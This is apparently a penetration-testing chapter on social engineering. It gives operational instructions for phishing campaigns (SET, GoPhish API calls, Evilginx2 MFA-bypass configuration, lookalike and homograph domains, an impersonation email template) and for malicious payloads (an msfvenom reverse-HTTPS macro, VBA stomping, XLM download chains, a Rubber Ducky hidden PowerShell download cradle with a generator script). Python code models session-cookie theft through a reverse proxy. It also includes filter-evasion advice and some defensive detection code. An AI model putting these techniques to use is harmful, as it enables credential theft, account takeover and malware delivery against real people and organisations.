Social Engineering and Client-Side Attack Vectors

The Social-Engineer Toolkit: Architecture and Customization

The Social-Engineer Toolkit (SET), developed by David Kennedy, remains the foundational framework for orchestrating client-side attacks within Kali Linux. Its modular architecture separates attack vectors into distinct components: spear-phishing, website cloning, infectious media generation, and mass-mailer functions. Understanding this architecture enables practitioners to construct realistic scenarios rather than rely on generic templates.

SET operates through a menu-driven interface, but most of its behaviour is governed by /etc/setoolkit/set.config. Parameters worth knowing include WEB_PORT (the port the cloned site listens on), EMAIL_PROVIDER (which SMTP provider the mailer modules use), AUTO_DETECT (when ON, SET detects the local IP address to embed in payloads and listeners rather than prompting for it) and APACHE_SERVER, which serves cloned pages from Apache instead of SET's built-in Python web server. WEBATTACK_SSL enables TLS on the cloned site; a valid certificate on a plausible domain is essential for credibility, since current browsers mark plain-HTTP pages with password fields as "Not secure".

The spear-phishing module (setoolkit → 1) Social-Engineering Attacks → 1) Spear-Phishing Attack Vectors) sends either a malicious attachment built from a Metasploit file-format module plus a payload of your choice, or a template-based message carrying an inline link. Do not expect the stock attachments to survive current endpoint protection; they are a starting point, not an evasion technique. The website cloning module lives under 2) Website Attack Vectors → 3) Credential Harvester Attack Method → 2) Site Cloner: SET fetches the target login page, rewrites its form so the submission is posted back to SET, logs every POST parameter, and redirects the victim to the real site. Field handling and the redirect live in the harvester source under /usr/share/setoolkit/src/webattack/harvester/, which is where to edit when you need to flag particular fields or forward captured data to your own endpoint instead of SET's built-in listener.

For realistic scenarios, the headers SET's mailer emits are built in /usr/share/setoolkit/src/phishing/smtp/client/smtp_web.py; edit it to add headers consistent with the impersonated organisation's mail flow. Deliverability against heuristic filtering depends far more on the sending infrastructure than on header cosmetics: send through an authenticated relay for a domain whose SPF and DKIM records align with the From address, and host the harvester on a domain with a valid certificate and some registration history rather than one created the day before.

Phishing Campaign Platforms: Scale and Sophistication

While SET excels at rapid prototyping, operational campaigns demand platforms with analytics, scheduling, and team collaboration. Three tools dominate this space with distinct architectural philosophies.

GoPhish provides open-source campaign management with a web-based dashboard. Its template system supports HTML email construction with Go template variables ({{.FirstName}}, {{.LastName}}, {{.Email}}, {{.URL}}, {{.Tracker}}, {{.TrackingURL}}); landing pages use the same syntax, can be cloned from a live site, and tie each form submission back to the recipient through the rid parameter carried in the phishing URL. The REST API (port 3333 by default) facilitates automation:

# Creating a campaign via the GoPhish API. The template, page, SMTP profile and
# group are referenced by the names they were created under; launch_date
# schedules the send (omit it to launch immediately). -k accepts the admin
# server's self-signed certificate.
curl -k -X POST https://gophish-server:3333/api/campaigns/ \
  -H "Authorization: Bearer <api-key>" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Q1-Financial-Review",
    "template": {"name": "SharePoint Document Alert"},
    "page": {"name": "Office365-Portal-Clone"},
    "smtp": {"name": "relay.corporate-backup.net"},
    "groups": [{"name": "accounting-targets"}],
    "url": "https://secure-document-portal.net/login",
    "launch_date": "2024-01-16T09:30:00-05:00"
  }'

Evilginx2 operates fundamentally differently. Instead of presenting a fake login form, it functions as a reverse proxy between the victim and the legitimate service: requests are relayed upstream, responses are rewritten so that links and cookies point at the phishing domain, and the session cookies the service issues after a successful login are captured in real time. Because the victim completes the real authentication, including any TOTP or push-notification 2FA step, the attacker obtains an authenticated session rather than just a password. Two caveats: origin-bound authenticators (FIDO2/WebAuthn, passkeys) defeat this, since the assertion is signed over the phishing origin and the service rejects it; and a stolen session can still be revoked or flagged by conditional-access and token-protection controls. Configuration binds a phishlet to an attacker-controlled hostname and creates a lure:

# Evilginx2: bind the o365 phishlet to an attacker-controlled hostname (the
# target host, login.microsoftonline.com, is defined inside the phishlet).
# phish.example.net and 203.0.113.10 stand in for the engagement's domain and VPS.
config domain phish.example.net
config ip 203.0.113.10
phishlets hostname o365 login.phish.example.net
phishlets enable o365
lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0
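
To make the reverse-proxy mechanism concrete, the following is an added example (not Evilginx2's code) that models the two response-side operations a kit like this performs: rewriting Set-Cookie domains and redirect targets so the victim's browser keeps talking to the phishing host, and harvesting the session cookies issued after the real login. The hostnames, the cookie names treated as the session set, and the two upstream responses are all constructed for the example.

```python
"""Minimal model of the reverse-proxy phishing flow: rewrite upstream responses
so cookies and links point at the phishing host, and harvest session cookies.
Example code added here, not part of Evilginx2. Hostnames, cookie names and
the two responses below are constructed for the example."""

# Assumed mapping: real hosts (left) to the attacker-controlled hostnames (right).
# Longer names come first so 'login.' is rewritten before the parent domain.
HOST_MAP = {
    "login.microsoftonline.com": "login.phish.example.net",
    "microsoftonline.com": "phish.example.net",
}
# Assumed: the cookies whose presence means the post-MFA session is replayable.
SESSION_COOKIE_NAMES = {"ESTSAUTH", "ESTSAUTHPERSISTENT"}

# Constructed upstream responses (header list, body) as the proxy sees them
# after the victim has finished the real login, including any MFA prompt.
UPSTREAM_RESPONSES = [
    ([("Location", "https://login.microsoftonline.com/common/reprocess"),
      ("Set-Cookie", "ESTSAUTH=tokenA; Domain=login.microsoftonline.com; Path=/; Secure; HttpOnly"),
      ("Set-Cookie", "buid=abc; Domain=.microsoftonline.com; Path=/; Secure"),
      ("Content-Security-Policy", "default-src 'self'")],
     '<a href="https://login.microsoftonline.com/common/login">Sign in</a>'),
    ([("Set-Cookie", "ESTSAUTHPERSISTENT=tokenB; Domain=login.microsoftonline.com; Path=/; Secure; HttpOnly")],
     ""),
]


def rewrite_host_in(text):
    """Replace every occurrence of a real hostname with its phishing counterpart."""
    for real, phish in HOST_MAP.items():
        text = text.replace(real, phish)
    return text


def rewrite_set_cookie(header_value):
    """Return (name, value, rewritten header). Only the Domain attribute changes:
    the victim's browser is talking to the phishing host, so a cookie scoped to
    the real domain would simply be dropped. Host-only cookies need no change."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    out = [parts[0]]
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        if key.strip().lower() == "domain":
            out.append("Domain=" + rewrite_host_in(val.strip().lstrip(".")))
        else:
            out.append(attr)
    return name.strip(), value.strip(), "; ".join(out)


def proxy_response(headers, body, session):
    """Rewrite one upstream response as the proxy forwards it to the victim,
    recording session cookies into `session`. Returns (headers, body)."""
    forwarded = []
    for name, value in headers:
        lname = name.lower()
        if lname == "set-cookie":
            cname, cvalue, rewritten = rewrite_set_cookie(value)
            if cname in SESSION_COOKIE_NAMES:
                session[cname] = cvalue          # the prize: a post-MFA session token
            forwarded.append((name, rewritten))
        elif lname in ("content-security-policy", "content-security-policy-report-only"):
            continue                             # dropped so injected scripts are not blocked
        elif lname == "location":
            forwarded.append((name, rewrite_host_in(value)))  # keep redirects inside the proxy
        else:
            forwarded.append((name, value))
    return forwarded, rewrite_host_in(body)


def session_complete(session):
    """True once every cookie needed to replay the session has been captured."""
    return SESSION_COOKIE_NAMES <= set(session)


def harvest(responses):
    """Run a sequence of upstream responses through the proxy; return the session store."""
    session = {}
    for headers, body in responses:
        proxy_response(headers, body, session)
    return session


if __name__ == "__main__":
    captured = harvest(UPSTREAM_RESPONSES)
    print(captured, "complete" if session_complete(captured) else "partial")
```

Nothing in this flow touches the second factor: the OTP or push approval travels through the proxy to the real service, and the cookies the service sets afterwards are what get captured. That is also why WebAuthn survives it, since the authenticator signs over the origin the browser is actually on (login.phish.example.net), which the relying party rejects.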

Modlishka shares Evilginx2's reverse-proxy architecture but is driven by a JSON configuration rather than phishlets, with a plugin system covering automatic certificate provisioning, a control panel for reviewing captured credentials, and JavaScript injection and content rewriting. Evilginx2's more active development and broader phishlet library make it the usual choice for engagements.

Document Macro and OLE Attack Techniques

Microsoft Office documents remain potent initial access vectors, particularly in environments with restrictive web filtering, although since 2022 Office blocks VBA macros by default in files carrying the Mark of the Web, so the document must reach the user without that mark or the pretext must walk the user through unblocking it. Modern attacks leverage three technical approaches with varying complexity and detection profiles.

MSFVenom macro generation provides baseline capability:

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=192.168.45.200 LPORT=443 \
  -f vba -o maldoc_macro.txt

The output places the shellcode in an auto-execute procedure (Auto_Open and Workbook_Open) and runs it through the familiar VirtualAlloc/RtlMoveMemory/CreateThread pattern. The stock template is signatured by every major vendor, and since Office 2019/Microsoft 365 the VBA runtime exposes macro behaviour to AMSI (Anti-Malware Scan Interface), so this output is a baseline to build on, not something to ship as is.

VBA Stomping evades source-based detection by exploiting how a VBA project is stored. Each module stream holds two representations of the macro: the compressed source code, and the compiled p-code (the PerformanceCache) that Office actually executes whenever the document was saved by the same Office version and VBA build as the one opening it. Stomping overwrites the compressed source with benign text while leaving the malicious p-code intact, so any tool that only decompresses the source sees nothing. pcodedmp disassembles the p-code and EvilClippy performs the stomp:

# VBA stomping workflow (EvilClippy is a .NET tool; run it under mono on Kali).
# -s replaces the source stream with fake_code.vba; -t pins the Office build
# whose p-code the document carries, e.g. 2016x86, so the cache is not discarded.
mono EvilClippy.exe -s fake_code.vba -t 2016x86 maldoc.doc

The resulting document displays harmless VBA when the source is inspected but executes the malicious p-code when the macro triggers. The technique is version-specific: if the opening Office build differs from the one that compiled the cache, Office discards the p-code and recompiles the (benign) source, so the attacker must know or guess the target's Office version. Forensically, decompress the source stream, disassemble the p-code with pcodedmp, and compare the two for procedures and API calls that appear in one but not the other (olevba reports such a mismatch as a stomping indicator). Comparing hashes of the two streams tells you nothing, since source and p-code never match byte for byte; the comparison has to be semantic, and automated triage rarely performs it.
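
The first step of that comparison, recovering the source from the module stream, is rarely shown, so here is an added example (not pcodedmp's or EvilClippy's code) that implements the MS-OVBA compressed-container decompression, builds test streams with a literal-only compressor, and applies a first-pass heuristic: a module whose source defines no procedure while a sizeable p-code cache sits in front of it. The module streams, the bytes standing in for a PerformanceCache, and the 512-byte threshold are all constructed or assumed for the example.

```python
"""Decompress the source half of a VBA module stream (MS-OVBA 2.4.1 'compressed
container') and apply a first-pass VBA-stomping heuristic. Example code added
here, not from pcodedmp or EvilClippy; the module streams below are constructed,
with arbitrary bytes standing in for a real PerformanceCache."""
import re


def decompress_vba(container):
    """Decompress an MS-OVBA compressed container, including copy tokens."""
    if not container or container[0] != 0x01:
        raise ValueError("missing container signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3          # size including the 2-byte header
        chunk = container[pos + 2:pos + chunk_size]
        chunk_start = len(out)                      # copy-token offsets are chunk-relative
        if not header & 0x8000:                     # raw chunk: literal bytes, no tokens
            out += chunk
        else:
            i = 0
            while i < len(chunk):
                flags = chunk[i]
                i += 1
                for bit in range(8):
                    if i >= len(chunk):
                        break
                    if not (flags >> bit) & 1:      # literal token: one byte
                        out.append(chunk[i])
                        i += 1
                    else:                           # copy token: (offset, length) back-reference
                        token = int.from_bytes(chunk[i:i + 2], "little")
                        i += 2
                        # The split between offset and length bits depends on how much
                        # of this chunk has been decompressed so far (spec CopyTokenHelp).
                        produced = len(out) - chunk_start
                        bit_count = max((produced - 1).bit_length(), 4)
                        length = (token & (0xFFFF >> bit_count)) + 3
                        offset = (token >> (16 - bit_count)) + 1
                        src = len(out) - offset
                        for k in range(length):     # byte-wise so overlapping copies work
                            out.append(out[src + k])
        pos += chunk_size
    return bytes(out)


def compress_vba_literal(data):
    """Build a valid container using literal tokens only; legal per the spec, just
    not space-efficient. 3584 literals plus 448 flag bytes fit the 4096-byte chunk limit."""
    container = bytearray(b"\x01")
    for start in range(0, len(data), 3584):
        piece = data[start:start + 3584]
        body = bytearray()
        for j in range(0, len(piece), 8):
            body.append(0x00)                       # flag byte: all eight tokens are literals
            body += piece[j:j + 8]
        header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
        container += header.to_bytes(2, "little") + body
    return bytes(container)


# Hand-assembled chunk exercising the copy-token path: literals 'a','b','c' then
# a token meaning "copy 6 bytes from 3 back", which must expand to b"abcabcabc".
COPY_TOKEN_SAMPLE = bytes.fromhex("01 05b0 08 616263 0320")

PROCEDURE_RE = re.compile(r"^\s*(Public\s+|Private\s+)?(Sub|Function)\s", re.I | re.M)


def analyze_module(stream, module_offset, min_pcode=512):
    """Split a module stream at MODULEOFFSET (taken from the project's dir stream):
    bytes before it are the p-code cache, bytes from it on are the compressed source.
    min_pcode is an assumed threshold, since even an empty module keeps a small
    cache; a hit here means 'disassemble with pcodedmp', not 'confirmed stomped'."""
    pcode = stream[:module_offset]
    source = decompress_vba(stream[module_offset:]).decode("latin-1")
    has_procedure = PROCEDURE_RE.search(source) is not None
    return {
        "pcode_bytes": len(pcode),
        "source": source,
        "has_procedure": has_procedure,
        "suspect_stomped": len(pcode) >= min_pcode and not has_procedure,
    }


# Constructed module streams: stand-in p-code bytes + compressed source, laid out
# the way a real module stream is.
FAKE_PCODE = bytes(range(256)) * 4
NORMAL_SOURCE = b'Attribute VB_Name = "Module1"\r\nSub AutoOpen()\r\n    MsgBox "hi"\r\nEnd Sub\r\n'
STOMPED_SOURCE = b'Attribute VB_Name = "Module1"\r\n'   # attribute-only source left after a stomp


def build_module_stream(pcode, source):
    """Return (stream, module_offset) for a synthetic module stream."""
    return pcode + compress_vba_literal(source), len(pcode)


if __name__ == "__main__":
    for label, src in (("normal", NORMAL_SOURCE), ("stomped", STOMPED_SOURCE)):
        stream, off = build_module_stream(FAKE_PCODE, src)
        print(label, analyze_module(stream, off)["suspect_stomped"])
```

The heuristic only catches stomps that leave an attribute-only or procedure-free source behind; an attacker who supplies a plausible benign Sub as the fake source defeats it, which is exactly why the p-code disassembly has to be compared against the recovered source rather than the source being judged on its own.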

XL4 Macro Resurgence exploits Excel 4.0 macros (XLM), a formula-based macro language that predates VBA and lives in macro sheets rather than in the VBA project. XLM runs through the formula engine, so VBA-oriented extraction does not see it, AMSI coverage for it arrived only in 2021, and vendor signatures were historically thin. A typical payload chains CALL and EXEC formulas: CALL into URLDownloadToFile to fetch an executable (an msfvenom-built one will do), then EXEC to launch it. XLMMacroDeobfuscator extracts and emulates these macros for analysis. The resurgence reflected attacker economics: XLM stayed enabled by default for compatibility, so it offered minimal-friction exploitation until Microsoft disabled XLM macros by default in Microsoft 365 from 2022; it now mainly works against older or deliberately relaxed installations.

USB Drop Attacks: Hardware Implants

The Hak5 Rubber Ducky and Bash Bunny are programmable USB attack platforms that exploit trust in physical media. They enumerate as Human Interface Devices (HID), that is, as keyboards, so autorun restrictions and USB mass-storage policies do not apply to them, and few environments block keyboard-class devices since that would block real keyboards too.

The Rubber Ducky types a pre-scripted keystroke sequence faster than any human. Its Ducky Script language is essentially a list of keystrokes and delays:

REM Accounting firm payload: PowerShell download cradle
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -enc [base64-encoded-command]
ENTER
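
The [base64-encoded-command] placeholder above hides the step people most often get wrong, so here is an added example (not Hak5's code) that produces the STRING line correctly: PowerShell's -EncodedCommand expects base64 of the UTF-16LE bytes of the script, not UTF-8, and the whole typed command has to fit in the Run box. The cradle URL uses a documentation address, and the 260-character Run-box limit is an assumed sanity check rather than a documented constant.

```python
"""Generate the Ducky Script for a hidden PowerShell download cradle.
Example code added here, not Hak5's; the cradle URL is a constructed
documentation address and MAX_RUN_BOX_CHARS is an assumed limit."""
import base64

# Assumed: the Win+R Run box rejects input beyond roughly this length, so the
# whole typed command must fit. Treat the number as a sanity check, not gospel.
MAX_RUN_BOX_CHARS = 260

# Constructed cradle: 192.0.2.10 is a documentation address, not a real server.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"


def encode_powershell_command(command):
    """powershell -EncodedCommand takes base64 of the UTF-16LE bytes of the script.
    Encoding UTF-8 by mistake is the classic failure: PowerShell decodes garbage and exits."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded):
    """Inverse of the above; handy for triage of a captured -enc argument."""
    return base64.b64decode(encoded).decode("utf-16-le")


def build_run_line(command):
    """The exact text the Ducky will type into the Run box."""
    line = "powershell -w hidden -enc " + encode_powershell_command(command)
    if len(line) > MAX_RUN_BOX_CHARS:
        raise ValueError(f"command is {len(line)} chars; keep the cradle short "
                         "and pull the real payload from the URL instead")
    return line


def build_ducky_script(command, label="PowerShell download cradle", boot_delay_ms=1000):
    """Full Ducky Script: wait for the HID to enumerate, open Run, type, execute."""
    return "\n".join([
        f"REM {label}",
        f"DELAY {boot_delay_ms}",
        "GUI r",
        "DELAY 500",
        "STRING " + build_run_line(command),
        "ENTER",
    ]) + "\n"


if __name__ == "__main__":
    print(build_ducky_script(CRADLE), end="")
```

Keep the typed cradle minimal and put everything else behind the URL: every extra character both lengthens the STRING line and widens the window in which the console flash or the keystroke burst can be noticed. The decode helper is equally useful on the defensive side, since -enc arguments in process-creation telemetry decode the same way.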

The Bash Bunny extends this with payload selection via a hardware switch, multiple attack modes (HID, mass storage, Ethernet) and Bunny Script for conditional logic. In Ethernet mode the device enumerates as a USB network adapter running its own DHCP and DNS responders, so the host prefers it for traffic; the classic uses are harvesting NTLM credentials from a locked workstation with a Responder-style payload and reaching hosts that have no other network path.

Physical placement maximizes psychological triggers: devices labeled "Q1 Financial Audit Results" or "Employee Compensation Review 2024" exploit authority and urgency. Give each dropped device a unique identifier, for example a per-device token in the payload's callback URL, so that a callback can be correlated with where and when the device was placed.

Psychological Principles in Technical Attack Design

Effective social engineering operationalizes cognitive biases systematically. Three principles demand particular attention during campaign architecture.

Authority exploits hierarchical compliance. Phishing emails impersonating CFOs, external auditors, or legal counsel achieve higher click-through rates than generic IT notifications. Technical implementation requires display-name spoofing (a From header whose display name reads "Sarah Chen, CFO" in front of an address on the attacker's lookalike domain, since most mail clients show only the display name) and signature and header details that match the executive's real communication patterns, which can often be extracted from public filings or conference presentations.

Urgency bypasses analytical processing. Campaigns targeting accounting firms during quarter-close periods, tax filing deadlines, or audit windows achieve contextual relevance. Time-limited access expiration ("Your DocuSign envelope expires in 4 hours") creates artificial scarcity demanding immediate action.

Reciprocity leverages obligation creation. Free tools, whitepapers, or "exclusive industry benchmarks" provided via email establish psychological debt. The subsequent credential request appears as reasonable exchange rather than exploitation.

Worked Example: Accounting Firm Phishing Campaign

Consider "Hendricks & Associates," a mid-size firm with 340 employees, undergoing SOC 2 Type II audit preparation.

Reconnaissance: LinkedIn identifies the CFO, audit committee chair, and IT director. SEC filings reveal engagement with "Preston Audit Services." The firm uses Microsoft 365 with Azure AD conditional access.

Domain Registration: Register hendricks-associates[.]net (available) as the primary sending domain, plus the homograph variant hẹndricks-associates[.]com (the e carries a combining dot below, so the registered label is actually a punycode xn-- form) for selected high-value targets. Publish SPF, DKIM and DMARC for these domains so that the messages authenticate: most gateways quarantine unauthenticated mail before any content heuristics run, and the legitimate firm's own records, visible through DNS enumeration, show which pattern to mirror.
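
Two checks worth running on any lookalike before it goes into a campaign (or, defensively, on any sender domain that shows up in mail logs) are what the domain looks like once IDNA-encoded, which is what the gateway and the resolver actually see, and which legitimate domain it collapses onto once diacritics are stripped. The following is an added example, not part of the scenario's tooling; the legitimate .com domain is assumed, since the scenario only states that the .net variant was available.

```python
"""Check how a look-alike domain appears to mail gateways and resolvers (its
punycode form) and reduce it to an ASCII skeleton to expose which legitimate
domain it imitates. Example code added here; the legitimate domain is assumed."""
import unicodedata


def to_punycode(domain):
    """What DNS and most gateways actually see: the IDNA (xn--) form of each label."""
    return domain.encode("idna").decode("ascii")


def skeleton(domain):
    """Decompose to NFD and drop combining marks so 'ẹ' collapses to 'e'. This only
    handles diacritics; a full confusables table (UTS #39) also maps cross-script
    look-alikes such as Cyrillic 'а' to Latin 'a'."""
    decomposed = unicodedata.normalize("NFD", domain)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def is_lookalike(candidate, legit):
    """True when the candidate differs from the legitimate domain but collapses onto it."""
    return candidate.lower() != legit.lower() and skeleton(candidate).lower() == legit.lower()


def non_ascii_labels(domain):
    """Labels carrying non-ASCII code points, i.e. the ones that become xn-- labels."""
    return [label for label in domain.split(".") if any(ord(ch) > 127 for ch in label)]


LEGIT = "hendricks-associates.com"        # assumed legitimate domain for the scenario
HOMOGRAPH = "hẹndricks-associates.com"    # the variant from the worked example

if __name__ == "__main__":
    print(to_punycode(HOMOGRAPH), is_lookalike(HOMOGRAPH, LEGIT), non_ascii_labels(HOMOGRAPH))
```

The punycode form is the practical limit of this trick: any gateway rule that flags xn-- sender domains, and any mail client that renders the ACE form instead of the Unicode string, strips the disguise, which is why the scenario reserves the homograph for selected targets rather than the whole list.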

Infrastructure: Deploy Evilginx2 with the login.microsoftonline.com phishlet bound to a hostname on the lookalike domain, capturing session cookies and redirecting to the legitimate Office 365 portal after authentication to minimize suspicion. Host it on a VPS provisioned for the engagement. If a CDN such as Cloudflare is placed in front to conceal the origin, remember that Evilginx2 expects to terminate TLS and obtain its own certificates, so the CDN's TLS mode and the certificate workflow have to be adjusted to match.

Email Template:

From: Preston Audit Services <[sender address on the lookalike domain]>
Subject: ACTION REQUIRED: Q4 Audit Evidence Portal Access

Dear {{.FirstName}},

As part of our ongoing SOC 2 Type II engagement, we've established 
a secure evidence portal for document submission.

Your access credentials were provisioned for {{.Email}}.

[Access Portal]  ← {{.URL}}, with the campaign URL set to the Evilginx2 lure

This link expires in 48 hours per our MSA Section 14.2. 
Direct questions to your engagement manager.

Regards,
Marcus Chen
Senior Manager, IT Risk Assurance
Preston Audit Services

Execution: Upload the target list and schedule the campaign via the GoPhish API (launch_date set to Tuesday 9:30 AM in the targets' local time zone). Enable open tracking through the {{.Tracker}} 1x1 pixel; clicks are attributed through the rid parameter GoPhish appends to the lure URL, and GoPhish webhooks can push open and click events to the team's tracker. Captured sessions are reported by Evilginx2 itself, since the login never touches a GoPhish landing page.

Legal Boundary: This campaign requires explicit written authorization from Hendricks & Associates' General Counsel, with defined scope, data handling procedures, and notification protocols for credential exposure. Unauthorized simulation may constitute wire fraud and a violation of the Computer Fraud and Abuse Act.